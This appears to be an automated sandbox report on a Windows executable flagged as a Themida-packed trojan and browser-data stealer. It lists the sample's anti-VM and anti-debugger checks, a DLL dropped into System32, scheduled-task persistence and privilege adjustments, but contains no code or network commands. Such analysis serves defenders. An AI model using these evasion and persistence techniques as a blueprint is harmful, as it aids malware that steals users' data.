Malware Analysis Report

2024-10-10 07:51

Sample ID 240615-z1dstsvakd
Target Bald.Win_New_Temp_Swoofer.exe
SHA256 d02f513e1673e5012e916fad43e0672ee0ff9cdfbc0733401b9b8fd4bd88d1f3
Tags
themida evasion trojan execution pyinstaller spyware stealer
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

d02f513e1673e5012e916fad43e0672ee0ff9cdfbc0733401b9b8fd4bd88d1f3

Threat Level: Likely malicious

The file Bald.Win_New_Temp_Swoofer.exe was found to be: Likely malicious.

Malicious Activity Summary

themida evasion trojan execution pyinstaller spyware stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Themida packer

Checks whether UAC is enabled

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-15 21:10

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 21:10

Reported

2024-06-15 21:13

Platform

win7-20231129-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\WindowsDSEProtectionSoft.dll C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"

Network

N/A

Files

memory/2784-0-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-1-0x0000000077C10000-0x0000000077C12000-memory.dmp

memory/2784-2-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-3-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-4-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-7-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-6-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-5-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-10-0x0000000077BC0000-0x0000000077D69000-memory.dmp

memory/2784-9-0x000000013F910000-0x000000014060B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 21:10

Reported

2024-06-15 21:13

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\WindowsDSEProtectionSoft.dll C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\URL Protocol C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open\command C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519 C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\ = "URL:Run game 1249325487893905519 protocol" C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
